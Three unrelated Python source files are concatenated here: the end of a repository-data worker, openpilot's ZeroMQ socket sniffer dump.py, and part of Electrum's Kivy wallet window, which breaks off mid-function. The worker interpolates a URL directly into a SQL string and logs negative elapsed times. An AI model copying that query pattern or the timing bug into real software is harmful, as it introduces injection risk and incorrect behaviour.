'gh_gravatar_id': None,
'gh_followers_url': None,
'gh_following_url': None,
'gh_gists_url': None,
'gh_starred_url': None,
'gh_subscriptions_url': None,
'gh_organizations_url': None,
'gh_repos_url': None,
'gh_events_url': None,
'gh_received_events_url': None,
'gh_type': None,
'gh_site_admin': None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: " + str(result.inserted_primary_key))
self.results_counter += 1
self.cntrb_id_inc = int(result.inserted_primary_key[0])
self.logger.info(f"Inserted contributor: {cntrb['cntrb_login']}\n")
return self.find_id_from_login(login, platform)
def get_owner_repo(self, git_url):
""" Gets the owner and repository names of a repository from a git url
:param git_url: String, the git url of a repository
:return: Tuple, includes the owner and repository names in that order
"""
split = git_url.split('/')
owner = split[-2]
repo = split[-1]
if '.git' == repo[-4:]:
repo = repo[:-4]
return owner, repo
def record_model_process(self, repo_id, model):
self.logger.info(f"This is the oauths 0 index {self.oauths[0]}")
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": model,
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Stopped",
"total_results": self.results_counter
}
if self.finishing_task:
result = self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.history_id += 1
else:
result = self.helper_db.execute(self.worker_history_table.insert().values(task_history))
self.logger.info("Record incomplete history tuple: {}\n".format(result.inserted_primary_key))
self.history_id = int(result.inserted_primary_key[0])
self.collection_start_time = time.time()
def register_task_completion(self, task, repo_id, model):
self.logger.info(f"Worker completed this task in {self.collection_start_time - time.time()} seconds.\n")
# Task to send back to broker
task_completed = {
'worker_id': self.config['id'],
'job_type': "MAINTAIN",
'repo_id': repo_id,
'job_model': model
}
key = 'github_url' if 'github_url' in task['given'] else 'git_url' if 'git_url' in task['given'] else \
'gitlab_url' if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
task_completed[key] = task['given']['github_url'] if 'github_url' in task['given'] else task['given']['git_url'] \
if 'git_url' in task['given'] else task['given']['gitlab_url'] if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
if key == 'INVALID_GIVEN':
self.register_task_failure(task, repo_id, "INVALID_GIVEN: Not a github/gitlab/git url.")
return
# Add to history table
task_history = {
'repo_id': repo_id,
'worker': self.config['id'],
'job_model': model,
'oauth_id': self.oauths[0]['oauth_id'],
'timestamp': datetime.datetime.now(),
'status': "Success",
'total_results': self.results_counter
}
self.helper_db.execute(self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id).values(task_history))
self.logger.info(f"Recorded job completion for: {task_completed}\n")
# Update job process table
updated_job = {
'since_id_str': repo_id,
'last_count': self.results_counter,
'last_run': datetime.datetime.now(),
'analysis_state': 0
}
self.helper_db.execute(self.worker_job_table.update().where(
self.worker_job_table.c.job_model==model).values(updated_job))
self.logger.info(f"Updated job process for model: {model}\n")
if self.config['offline_mode'] is False:
# Notify broker of completion
self.logger.info(f"Telling broker we completed task: {task_completed}\n")
self.logger.info(f"This task inserted: {self.results_counter + self.insert_counter} tuples " +
f"and updated {self.update_counter} tuples.\n")
requests.post('http://{}:{}/api/unstable/completed_task'.format(
self.config['host_broker'],self.config['port_broker']), json=task_completed)
# Reset results counter for next task
self.results_counter = 0
self.insert_counter = 0
self.update_counter = 0
def register_task_failure(self, task, repo_id, e):
self.logger.error(f"Worker ran into an error for task: {task}")
self.logger.error(
f"Worker was processing this task for {self.collection_start_time - time.time()} "
"seconds."
)
self.logger.error("Printing traceback...")
self.logger.error(e)
tb = traceback.format_exc()
self.logger.error(tb)
self.logger.info(f"This task inserted {self.results_counter} tuples before failure.")
self.logger.info("Notifying broker and logging task failure in database...")
key = (
'github_url' if 'github_url' in task['given'] else 'git_url'
if 'git_url' in task['given'] else 'gitlab_url'
if 'gitlab_url' in task['given'] else 'INVALID_GIVEN'
)
url = task['given'][key]
""" Query all repos with repo url of given task """
repoUrlSQL = s.sql.text("""
SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'
""".format(url))
repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])
task['worker_id'] = self.config['id']
try:
requests.post("http://{}:{}/api/unstable/task_error".format(
self.config['host_broker'],self.config['port_broker']), json=task)
except requests.exceptions.ConnectionError:
self.logger.error("Could not send task failure message to the broker:")
self.logger.error(e)
except Exception:
self.logger.error("An error occured while informing broker about task failure:")
self.logger.error(e)
# Add to history table
task_history = {
"repo_id": repo_id,
"worker": self.config['id'],
"job_model": task['models'][0],
"oauth_id": self.oauths[0]['oauth_id'],
"timestamp": datetime.datetime.now(),
"status": "Error",
"total_results": self.results_counter
}
self.helper_db.execute(
self.worker_history_table.update().where(
self.worker_history_table.c.history_id==self.history_id
).values(task_history)
)
self.logger.error(f"Recorded job error in the history table for: {task}")
# Update job process table
updated_job = {
"since_id_str": repo_id,
"last_count": self.results_counter,
"last_run": datetime.datetime.now(),
"analysis_state": 0
}
self.helper_db.execute(
self.worker_job_table.update().where(
self.worker_job_table.c.job_model==task['models'][0]
).values(updated_job)
)
self.logger.info(f"Updated job process for model: {task['models'][0]}\n")
# Reset results counter for next task
self.results_counter = 0
|
dump.py
|
#!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
context = zmq.Context()
poller = zmq.Poller()
parser = argparse.ArgumentParser(description='Sniff a communcation socket')
parser.add_argument('--pipe', action='store_true')
parser.add_argument('--raw', action='store_true')
parser.add_argument('--json', action='store_true')
parser.add_argument('--dump-json', action='store_true')
parser.add_argument('--no-print', action='store_true')
parser.add_argument('--proxy', action='store_true', help='republish on localhost')
parser.add_argument('--map', action='store_true')
parser.add_argument('--addr', default='127.0.0.1')
parser.add_argument('--values', help='values to monitor (instead of entire event)')
parser.add_argument("socket", type=str, nargs='*', help="socket name")
args = parser.parse_args()
republish_socks = {}
for m in args.socket if len(args.socket) > 0 else service_list:
if m in service_list:
port = service_list[m].port
elif m.isdigit():
port = int(m)
else:
print("service not found")
exit(-1)
sock = messaging.sub_sock(context, port, poller, addr=args.addr)
if args.proxy:
republish_socks[sock] = messaging.pub_sock(context, port)
if args.map:
from flask.ext.socketio import SocketIO #pylint: disable=no-name-in-module, import-error
from flask import Flask
app = Flask(__name__)
socketio = SocketIO(app, async_mode='threading')
server_thread = Thread(target=run_server, args=(socketio,))
server_thread.daemon = True
server_thread.start()
print 'server running'
values = None
if args.values:
values = [s.strip().split(".") for s in args.values.split(",")]
while 1:
polld = poller.poll(timeout=1000)
for sock, mode in polld:
if mode != zmq.POLLIN:
continue
msg = sock.recv()
evt = log.Event.from_bytes(msg)
if sock in republish_socks:
republish_socks[sock].send(msg)
if args.map and evt.which() == 'liveLocation':
print 'send loc'
socketio.emit('location', {
'lat': evt.liveLocation.lat,
'lon': evt.liveLocation.lon,
'alt': evt.liveLocation.alt,
})
if not args.no_print:
if args.pipe:
sys.stdout.write(msg)
sys.stdout.flush()
elif args.raw:
hexdump(msg)
elif args.json:
print(json.loads(msg))
elif args.dump_json:
print json.dumps(evt.to_dict())
elif values:
print "logMonotime = {}".format(evt.logMonoTime)
for value in values:
if hasattr(evt, value[0]):
item = evt
for key in value:
item = getattr(item, key)
print "{} = {}".format(".".join(value), item)
print ""
else:
print evt
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice, parse_max_spend)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.bitcoin import COIN
from electrum.gui import messages
from .i18n import _
from .util import get_default_language
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
if not self._init_finished:
return
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def set_auto_connect(self, b: bool):
# This method makes sure we persist x into the config even if self.auto_connect == b.
# Note: on_auto_connect() only gets called if the value of the self.auto_connect property *changes*.
self.electrum_config.set_key('auto_connect', b)
self.auto_connect = b
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
if not self._init_finished:
return
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME or scheme == LIGHTNING_URI_SCHEME:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / COIN
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = COIN * Decimal(fiat_amount) / Decimal(rate)
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str: str) -> Optional[int]:
if not amount_str:
return None
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
_init_finished = False
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', get_default_language())
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
self._init_finished = True
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
if self.network and self.electrum_config.get('auto_connect') is None:
self.popup_dialog("first_screen")
# load_wallet_on_start will be called later, after initial network setup is completed
else:
# load wallet
self.load_wallet_on_start()
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def load_wallet_on_start(self):
"""As part of app startup, try to load last wallet."""
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
